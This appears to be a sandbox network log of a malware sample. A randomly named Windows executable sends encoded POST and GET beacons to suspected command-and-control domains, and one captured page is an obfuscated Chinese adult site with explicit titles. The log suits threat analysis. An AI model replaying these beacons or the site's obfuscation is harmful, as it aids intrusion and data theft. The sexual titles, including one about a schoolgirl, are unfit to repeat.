Sep 30, 2024 18:44:30.590893984 CEST | 539 | OUT | GET /mxqs/?gHCXmDU=rHSAWCOTv0B2OyWbYMKwkuU+0pm+dYnzeuWywUFjfL0Y5nHDImWR+DkgzCKA2Uf76rKFoLo4oU5TM+FaPt+JwQr3UHywKVmmcKRjYyDIvIOI0clKCIXncFUG+d5lZOlczw==&Gh9=g8u8 HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Host: www.dxeg.lol
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
Sep 30, 2024 18:44:31.185806990 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Mon, 30 Sep 2024 16:44:31 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 18836
                                                                                          Last-Modified: Mon, 30 Sep 2024 16:20:03 GMT
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          ETag: "66facfb3-4994"
                                                                                          Accept-Ranges: bytes
                                                                                          Data Raw: 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 75 66 65 66 66 25 33 43 25 32 31 44 4f 43 54 59 50 45 25 32 30 68 74 6d 6c 25 33 45 25 33 43 68 74 6d 6c 25 32 30 6c 61 6e 67 25 33 44 25 32 32 7a 68 2d 43 4e 25 32 32 25 33 45 25 33 43 68 65 61 64 25 33 45 25 33 43 74 69 74 6c 65 25 33 45 25 75 35 39 32 37 25 75 38 63 36 31 25 75 38 39 63 36 25 75 39 38 39 31 5f 64 78 32 32 2e 78 79 7a 25 75 35 36 64 65 25 75 35 62 62 36 25 75 35 62 66 63 25 75 38 32 32 61 25 33 43 2f 74 69 74 6c 65 25 33 45 25 33 43 6d 65 74 61 25 32 30 6e 61 6d 65 25 33 44 25 32 32 6b 65 79 77 6f 72 64 73 25 32 32 25 32 30 63 6f 6e 74 65 6e 74 25 33 44 25 32 32 25 75 37 37 65 64 25 75 38 39 63 36 25 75 39 38 39 31 25 32 43 25 75 36 34 31 65 25 75 37 62 31 31 25 75 38 39 63 36 25 75 39 38 39 31 25 32 43 25 75 38 39 63 36 25 75 39 38 39 31 25 75 35 32 30 36 25 75 34 65 61 62 25 32 43 25 75 35 31 34 64 25 75 38 64 33 39 25 75 38 39 63 36 25 75 39 38 39 31 25 32 43 [TRUNCATED]
                                                                                          Data Ascii: <script>...document.write(unescape("%ufeff%3C%21DOCTYPE%20html%3E%3Chtml%20lang%3D%22zh-CN%22%3E%3Chead%3E%3Ctitle%3E%u5927%u8c61%u89c6%u9891_dx22.xyz%u56de%u5bb6%u5bfc%u822a%3C/title%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22%u77ed%u89c6%u9891%2C%u641e%u7b11%u89c6%u9891%2C%u89c6%u9891%u5206%u4eab%2C%u514d%u8d39%u89c6%u9891%2C%u5728%u7ebf%u89c6%u9891%2C%u9884%u544a%u7247%22%3E%3Cmeta%20name%3D%22description%22%20content%3D%22%u63d0%u4f9b%u6700%u65b0%u6700%u5feb%u7684%u89c6%u9891%u5206%u4eab%u6570%u636e%22%3E%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text/html%3B%20charset%3DUTF-8%22%20/%3E%3Cmeta%20name%3D%22renderer%22%20content%3D%22webkit%7Cie-comp%7Cie-stand%22%20/%3E%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3Dedge%22%20/%3E%3Cmeta%20name%3D%22format-detection%22%20content%3D%22telephone%3Dno%22%20/%3E%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3D480%2C%20user-scalable%3Dno%2C%20viewport-fit%3Dcover%22%20/%3E%3Cm
Sep 30, 2024 18:44:31.185832024 CEST | 1236 | IN | Data Raw: 65 74 61 25 32 30 68 74 74 70 2d 65 71 75 69 76 25 33 44 25 32 32 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 25 32 32 25 32 30 63 6f 6e 74 65 6e 74 25 33 44 25 32 32 6e 6f 2d 63 61 63 68 65 25 32 43 25 32 30 6e 6f 2d 73 74 6f 72 65 25 32 43 25 32 30
                                                                                          Data Ascii: eta%20http-equiv%3D%22Cache-Control%22%20content%3D%22no-cache%2C%20no-store%2C%20must-revalidate%22%20/%3E%3Cscript%20src%3D%22/Tpl/cl/facai/js/cnzz.js%22%20type%3D%22text/javascript%22%3E%3C/script%3E%3Clink%20href%3D%22/Tpl/cl/facai/css/glo
Sep 30, 2024 18:44:31.185849905 CEST | 348 | IN | Data Raw: 6e 61 76 25 32 32 25 33 45 25 33 43 73 63 72 69 70 74 25 32 30 74 79 70 65 25 33 44 25 32 32 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 25 32 32 25 33 45 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 6c 6e 25 32 38 77 69 6e 64 6f 77 2e 64 68 63 64
                                                                                          Data Ascii: nav%22%3E%3Cscript%20type%3D%22text/javascript%22%3Edocument.writeln%28window.dhcd%29%3B%3C/script%3E%3C/div%3E%3Cdiv%20class%3D%22clear%22%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20class%3D%22head_h%22%3E%3C/div%3E%3Cscript%20type%3D%22text/ja
Sep 30, 2024 18:44:31.185867071 CEST | 1236 | IN | Data Raw: 71 25 32 30 74 6f 70 74 79 70 65 25 32 32 25 33 45 25 33 43 73 63 72 69 70 74 25 32 30 74 79 70 65 25 33 44 25 32 32 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 25 32 32 25 33 45 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 6c 6e 25 32 38 77 69 6e
                                                                                          Data Ascii: q%20toptype%22%3E%3Cscript%20type%3D%22text/javascript%22%3Edocument.writeln%28window.dhcd%29%3B%3C/script%3E%3Cscript%20type%3D%22text/javascript%22%3Edocument.writeln%28window.dhxwz%29%3B%3C/script%3E%3Cdiv%20class%3D%22clear%22%3E%3C/div%3E
Sep 30, 2024 18:44:31.185879946 CEST | 224 | IN | Data Raw: 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 33 45 25 75 38 62 61 39 25 75 35 39 64 30 25 75 35 39 64 30 25 75 38 64 65 61 25 75 34 65 30 62 25 75 36 37 36 35 25 75 35 65 32 65 25 75 36 32 31 31 25 75 35 34 30 33 25 75 39 65 32 31 25 75 35 64 66
                                                                                          Data Ascii: 3D%22_blank%22%3E%u8ba9%u59d0%u59d0%u8dea%u4e0b%u6765%u5e2e%u6211%u5403%u9e21%u5df4~%u6deb%u8361%u5145%u65a5%u5c0f%u5634~%u706b%u529b%u8f93%u51fa%u6e7f%u6dcb%u5c0f%u7a74%3C/a%3E%3C/h3%3E%3Cspan%20class%3D%22z_s%22%3E%3C/span
Sep 30, 2024 18:44:31.185894012 CEST | 1236 | IN | Data Raw: 25 33 45 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 63 6c 65 61 72 25 32 32 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 64 69 76 25 32
                                                                                          Data Ascii: %3E%3Cdiv%20class%3D%22clear%22%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20class%3D%22col-lg-4%20col-md-4%20col-xs-6%22%3E%3Cdiv%20class%3D%22n_r%22%3E%3Cdiv%20class%3D%22t_p%22%3E%3Ca%20href%3D%22https%3A//xjwj60erdhd1j944a2d6f829h.92
Sep 30, 2024 18:44:31.185909033 CEST | 124 | IN | Data Raw: 32 30 63 6c 61 73 73 25 33 44 25 32 32 6c 61 7a 79 25 32 32 25 32 30 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 25 33 44 25 32 32 68 74 74 70 73 25 33 41 2f 2f 6d 64 31 34 35 76 31 2e 63 6f 6d 2f 6b 6b 66 37 6c 6d 61 71 2f 69 6e 64 65 78 2e 6a 70 67
                                                                                          Data Ascii: 20class%3D%22lazy%22%20data-original%3D%22https%3A//md145v1.com/kkf7lmaq/index.jpg.js%22%20src%3D%22/images/blank.png%22%20/
Sep 30, 2024 18:44:31.186395884 CEST | 1236 | IN | Data Raw: 25 33 45 25 33 43 2f 61 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 77 5f 7a 25 32 32 25 33 45 25 33 43 68 33 25 33 45 25 33 43 61 25 32 30 68 72 65 66 25 33 44 25 32 32 2f 70 2f 31 2f 33 34
                                                                                          Data Ascii: %3E%3C/a%3E%3C/div%3E%3Cdiv%20class%3D%22w_z%22%3E%3Ch3%3E%3Ca%20href%3D%22/p/1/34480.html%22%20target%3D%22_blank%22%3E%u5973%u5b66%u751f%u5728%u88ab%u5360%u7528%u7684%u5395%u6240%u524d%u5c3f%u5c3f~%281%29%3C/a%3E%3C/h3%3E%3Cspan%20class%3D%2
Sep 30, 2024 18:44:31.186439037 CEST | 1236 | IN | Data Raw: 6f 72 69 67 69 6e 61 6c 25 33 44 25 32 32 68 74 74 70 73 25 33 41 2f 2f 6d 64 31 34 35 76 31 2e 63 6f 6d 2f 33 79 79 38 38 64 61 64 2f 69 6e 64 65 78 2e 6a 70 67 2e 6a 73 25 32 32 25 32 30 73 72 63 25 33 44 25 32 32 2f 69 6d 61 67 65 73 2f 62 6c
                                                                                          Data Ascii: original%3D%22https%3A//md145v1.com/3yy88dad/index.jpg.js%22%20src%3D%22/images/blank.png%22%20/%3E%3C/a%3E%3C/div%3E%3Cdiv%20class%3D%22w_z%22%3E%3Ch3%3E%3Ca%20href%3D%22/p/1/34478.html%22%20target%3D%22_blank%22%3Emumuq_%u8fa6%u516c%u5ba4%u5
Sep 30, 2024 18:44:31.186454058 CEST | 348 | IN | Data Raw: 73 25 33 44 25 32 32 74 5f 70 25 32 32 25 33 45 25 33 43 61 25 32 30 68 72 65 66 25 33 44 25 32 32 2f 70 2f 31 2f 33 34 34 35 36 2e 68 74 6d 6c 25 32 32 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 33 45 25 33 43 69
                                                                                          Data Ascii: s%3D%22t_p%22%3E%3Ca%20href%3D%22/p/1/34456.html%22%20target%3D%22_blank%22%3E%3Cimg%20class%3D%22lazy%22%20data-original%3D%22https%3A//md145v1.com/ygokcnfz/index.jpg.js%22%20src%3D%22/images/blank.png%22%20/%3E%3C/a%3E%3C/div%3E%3Cdiv%20clas
                                                                                          Sep 30, 2024 18:44:31.190866947 CEST | 1236 | IN | Data Raw: 35 34 65 35 25 75 35 34 65 35 25 75 36 36 32 66 25 75 37 33 61 39 25 75 36 65 33 38 25 75 36 32 30 66 25 75 38 66 64 38 25 75 36 36 32 66 25 75 37 33 61 39 25 75 34 65 62 61 25 75 35 62 62 36 25 75 37 36 38 34 25 75 35 63 30 66 25 75 37 61 37 34
                                                                                          Data Ascii: 54e5%u54e5%u662f%u73a9%u6e38%u620f%u8fd8%u662f%u73a9%u4eba%u5bb6%u7684%u5c0f%u7a74-%u5343%u591c%u55b5%u55b5%3C/a%3E%3C/h3%3E%3Cspan%20class%3D%22z_s%22%3E%3C/span%3E%3Cdiv%20class%3D%22clear%22%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          1 | 192.168.2.5 | 49713 | 3.33.130.190 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Sep 30, 2024 18:44:46.365623951 CEST | 797 | OUT | POST /ezjb/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.bqberw.vip
                                                                                          Origin: http://www.bqberw.vip
                                                                                          Referer: http://www.bqberw.vip/ezjb/
                                                                                          Content-Length: 208
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 6f 31 36 4a 2f 4f 48 53 65 51 4f 46 77 62 33 49 77 72 55 7a 46 56 73 61 5a 55 37 37 57 6f 53 62 41 49 54 6c 45 57 61 41 65 38 31 79 65 79 67 66 6b 4f 35 32 75 30 7a 6c 75 61 64 33 5a 77 36 30 6e 57 31 44 43 59 73 67 62 51 6f 76 79 76 4c 61 72 72 70 52 56 30 53 47 62 71 48 33 44 56 6b 39 4e 64 61 59 2f 6c 47 32 78 56 73 77 53 4b 45 63 42 75 48 65 34 53 48 51 46 30 66 50 32 75 59 78 6f 31 46 63 35 6c 32 45 69 72 64 56 4e 55 64 46 4d 55 42 56 6d 65 33 55 69 44 47 46 64 30 77 30 36 77 63 2b 61 54 55 33 44 37 71 2f 62 4b 48 41 46 38 61 6d 77 6d 61 43 77 47 6d 4a 43 2f 6b 54 37 2f 50 66 4e 78 73 3d
                                                                                          Data Ascii: gHCXmDU=o16J/OHSeQOFwb3IwrUzFVsaZU77WoSbAITlEWaAe81yeygfkO52u0zluad3Zw60nW1DCYsgbQovyvLarrpRV0SGbqH3DVk9NdaY/lG2xVswSKEcBuHe4SHQF0fP2uYxo1Fc5l2EirdVNUdFMUBVme3UiDGFd0w06wc+aTU3D7q/bKHAF8amwmaCwGmJC/kT7/PfNxs=


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          2 | 192.168.2.5 | 49714 | 3.33.130.190 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Sep 30, 2024 18:44:48.912132978 CEST | 817 | OUT | POST /ezjb/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.bqberw.vip
                                                                                          Origin: http://www.bqberw.vip
                                                                                          Referer: http://www.bqberw.vip/ezjb/
                                                                                          Content-Length: 228
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 6f 31 36 4a 2f 4f 48 53 65 51 4f 46 78 36 48 49 79 49 73 7a 4e 56 73 5a 63 55 37 37 59 49 53 6c 41 49 66 6c 45 55 33 64 65 50 52 79 51 79 77 66 6c 4b 56 32 6e 6b 7a 6c 67 36 64 32 48 41 36 2f 6e 57 35 68 43 63 73 67 62 55 34 76 79 76 37 61 6f 61 70 53 61 45 53 41 55 4b 48 31 4d 31 6b 39 4e 64 61 59 2f 6c 54 64 78 52 41 77 4f 71 55 63 41 4d 2f 66 6b 43 48 54 45 30 66 50 39 4f 59 31 6f 31 45 37 35 6e 44 70 69 6f 31 56 4e 55 4e 46 50 46 42 57 73 65 32 2b 2f 7a 48 6b 4e 46 74 4f 69 77 4d 46 61 44 4a 67 61 59 69 47 61 38 71 71 66 65 53 4f 6a 47 32 36 67 56 75 2b 54 50 46 36 68 63 66 76 54 6d 36 5a 39 76 42 65 4f 7a 2f 47 6f 48 65 64 34 72 39 47 51 34 54 4e
                                                                                          Data Ascii: gHCXmDU=o16J/OHSeQOFx6HIyIszNVsZcU77YISlAIflEU3dePRyQywflKV2nkzlg6d2HA6/nW5hCcsgbU4vyv7aoapSaESAUKH1M1k9NdaY/lTdxRAwOqUcAM/fkCHTE0fP9OY1o1E75nDpio1VNUNFPFBWse2+/zHkNFtOiwMFaDJgaYiGa8qqfeSOjG26gVu+TPF6hcfvTm6Z9vBeOz/GoHed4r9GQ4TN


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          3 | 192.168.2.5 | 49715 | 3.33.130.190 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Sep 30, 2024 18:44:51.458947897 CEST | 1834 | OUT | POST /ezjb/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.bqberw.vip
                                                                                          Origin: http://www.bqberw.vip
                                                                                          Referer: http://www.bqberw.vip/ezjb/
                                                                                          Content-Length: 1244
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 6f 31 36 4a 2f 4f 48 53 65 51 4f 46 78 36 48 49 79 49 73 7a 4e 56 73 5a 63 55 37 37 59 49 53 6c 41 49 66 6c 45 55 33 64 65 50 5a 79 51 45 38 66 6b 72 56 32 39 6b 7a 6c 2f 4b 64 7a 48 41 36 75 6e 57 52 6c 43 63 70 58 62 53 6b 76 7a 4d 7a 61 74 6f 42 53 42 30 53 41 4d 36 48 30 44 56 6b 6f 4e 65 69 63 2f 6c 44 64 78 52 41 77 4f 76 59 63 51 75 48 66 6d 43 48 51 46 30 66 44 32 75 59 64 6f 31 63 42 35 6e 47 55 69 59 56 56 4e 31 39 46 4b 33 70 57 67 65 33 59 38 7a 48 47 4e 46 68 72 69 77 51 34 61 41 56 47 61 59 61 47 57 39 72 64 49 39 43 79 34 45 6d 38 6d 33 69 53 52 49 46 67 69 2f 6a 30 66 55 43 50 2f 66 64 39 48 48 44 62 71 54 50 4a 69 64 68 4d 64 50 4f 48 37 68 66 7a 6e 73 2b 53 44 31 63 75 33 47 30 4d 75 48 62 53 7a 30 38 6e 4c 53 4d 71 46 2f 52 56 48 37 59 6d 55 49 2f 62 62 78 4b 44 74 6c 76 39 49 36 76 58 61 48 5a 49 77 6e 50 41 41 74 59 67 4d 7a 59 30 58 64 7a 59 75 4e 45 2b 77 76 6a 6a 32 62 6b 46 72 55 57 49 2f 55 69 75 4a 4f 38 45 30 56 31 72 4e 66 51 79 76 61 75 4d 6c 73 [TRUNCATED]
                                                                                          Data Ascii: gHCXmDU=o16J/OHSeQOFx6HIyIszNVsZcU77YISlAIflEU3dePZyQE8fkrV29kzl/KdzHA6unWRlCcpXbSkvzMzatoBSB0SAM6H0DVkoNeic/lDdxRAwOvYcQuHfmCHQF0fD2uYdo1cB5nGUiYVVN19FK3pWge3Y8zHGNFhriwQ4aAVGaYaGW9rdI9Cy4Em8m3iSRIFgi/j0fUCP/fd9HHDbqTPJidhMdPOH7hfzns+SD1cu3G0MuHbSz08nLSMqF/RVH7YmUI/bbxKDtlv9I6vXaHZIwnPAAtYgMzY0XdzYuNE+wvjj2bkFrUWI/UiuJO8E0V1rNfQyvauMlsNE0WZyykjx+Hy75ukIwsOvc5G2eV29r7ps314XEqAZDilZPmdA8bsXvYZHxHqggrT2aiHt9VxUEgyhxLf3yzYXVXaqk5Q/DC1/qRUERZsqqtPYwTYQ1joXPJyTkPvzOJ1YNUWCBgCgXEmIN3s4NTGLkbxO8Q/o6TxEHJzDPvenOj+0Us2mDVvbNTqEivZGg7H3vwlrnJ1XEqKg09rvy6udSTK4cJhpjqWLzZWSQvzwmF6G+NrS+k8ze/nkrnbO9dsBjgoKxcj6zu2cPiBtxuZlGNXuNpqfsIxLzCu2l0Gf3QTdvnzbdO4YEt5emKzOOHBpx93+Es63Cw+SPxNTAapb+82nbxvjMFyRKPjTAyaX6yvsjfDwFIirbPa7lpLzvNr62KlZGVjYn89n3DQ4mGMZ7QpWrTtclsOp2oSJIZCrAxSbt/IeAkWNWCE6aCl4/YB2RtZSfcHSI0Ry7/e9yCt4zebnFXt9LJ2OgngDKxPc0yKckMwIcJwIPuRLCEnPCtGD+m68b3vyZxvBnTEhWp5SFfzDR9p3wZBRnIKF9NIMgoo9cFX/j0My7zeM+zAGklDKX9SFyz37YrCy/UuuFr/tDTeIbHtIgRnA5VtBITw3tlW5CIr6TpeG0VyAL2qeb1JzGTN2wUvqk/ld9sElIOsgxG8M50forkV3 [TRUNCATED]


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          4 | 192.168.2.5 | 49716 | 3.33.130.190 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Sep 30, 2024 18:44:54.016280890 CEST | 541 | OUT | GET /ezjb/?gHCXmDU=l3Sp86LdHQK51JyE1bYSLRwrZz79eLj2OPa9S2eacvhOVgE1mplOojXymOZ9YDGfggwACbk9WjYrzuHmvoZIXyGwVLnNH3EmPti700Sf3mBkVqNnJJuO7TSqISvYzPtlzQ==&Gh9=g8u8 HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Host: www.bqberw.vip
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Sep 30, 2024 18:44:54.473778963 CEST | 404 | IN | HTTP/1.1 200 OK
                                                                                          Server: openresty
                                                                                          Date: Mon, 30 Sep 2024 16:44:54 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 264
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 48 43 58 6d 44 55 3d 6c 33 53 70 38 36 4c 64 48 51 4b 35 31 4a 79 45 31 62 59 53 4c 52 77 72 5a 7a 37 39 65 4c 6a 32 4f 50 61 39 53 32 65 61 63 76 68 4f 56 67 45 31 6d 70 6c 4f 6f 6a 58 79 6d 4f 5a 39 59 44 47 66 67 67 77 41 43 62 6b 39 57 6a 59 72 7a 75 48 6d 76 6f 5a 49 58 79 47 77 56 4c 6e 4e 48 33 45 6d 50 74 69 37 30 30 53 66 33 6d 42 6b 56 71 4e 6e 4a 4a 75 4f 37 54 53 71 49 53 76 59 7a 50 74 6c 7a 51 3d 3d 26 47 68 39 3d 67 38 75 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gHCXmDU=l3Sp86LdHQK51JyE1bYSLRwrZz79eLj2OPa9S2eacvhOVgE1mplOojXymOZ9YDGfggwACbk9WjYrzuHmvoZIXyGwVLnNH3EmPti700Sf3mBkVqNnJJuO7TSqISvYzPtlzQ==&Gh9=g8u8"}</script></head></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          5 | 192.168.2.5 | 49717 | 3.33.130.190 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Sep 30, 2024 18:44:59.522563934 CEST | 815 | OUT | POST /0fox/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.weatherbook.live
                                                                                          Origin: http://www.weatherbook.live
                                                                                          Referer: http://www.weatherbook.live/0fox/
                                                                                          Content-Length: 208
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 31 41 62 71 73 47 53 57 76 6a 56 48 50 61 4d 45 49 6d 4c 64 52 6a 5a 35 44 56 37 42 77 57 69 49 76 30 54 7a 4a 31 57 42 74 79 76 46 33 7a 45 41 45 73 32 63 6b 43 46 58 4f 33 74 78 2b 57 6e 32 47 4a 2f 51 37 38 4c 50 45 6b 46 4f 57 56 2b 30 61 79 4a 54 41 73 33 68 6c 52 44 36 65 4e 63 4e 63 45 71 6f 62 2f 56 6d 68 2f 4c 2f 53 37 49 49 73 51 31 30 76 58 76 6d 64 70 6d 71 35 69 66 6d 34 4a 37 37 70 39 4e 5a 74 6e 54 42 73 53 5a 64 6f 2b 63 78 55 30 6a 37 4e 51 73 74 66 73 68 50 37 4e 4e 6d 7a 32 2f 71 6e 78 69 50 58 6e 48 7a 65 4e 6b 4b 65 50 66 4f 48 65 41 6c 57 53 42 75 77 68 46 6a 33 6f 67 3d
                                                                                          Data Ascii: gHCXmDU=1AbqsGSWvjVHPaMEImLdRjZ5DV7BwWiIv0TzJ1WBtyvF3zEAEs2ckCFXO3tx+Wn2GJ/Q78LPEkFOWV+0ayJTAs3hlRD6eNcNcEqob/Vmh/L/S7IIsQ10vXvmdpmq5ifm4J77p9NZtnTBsSZdo+cxU0j7NQstfshP7NNmz2/qnxiPXnHzeNkKePfOHeAlWSBuwhFj3og=


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          6 | 192.168.2.5 | 49718 | 3.33.130.190 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Sep 30, 2024 18:45:02.067527056 CEST | 835 | OUT | POST /0fox/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.weatherbook.live
                                                                                          Origin: http://www.weatherbook.live
                                                                                          Referer: http://www.weatherbook.live/0fox/
                                                                                          Content-Length: 228
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
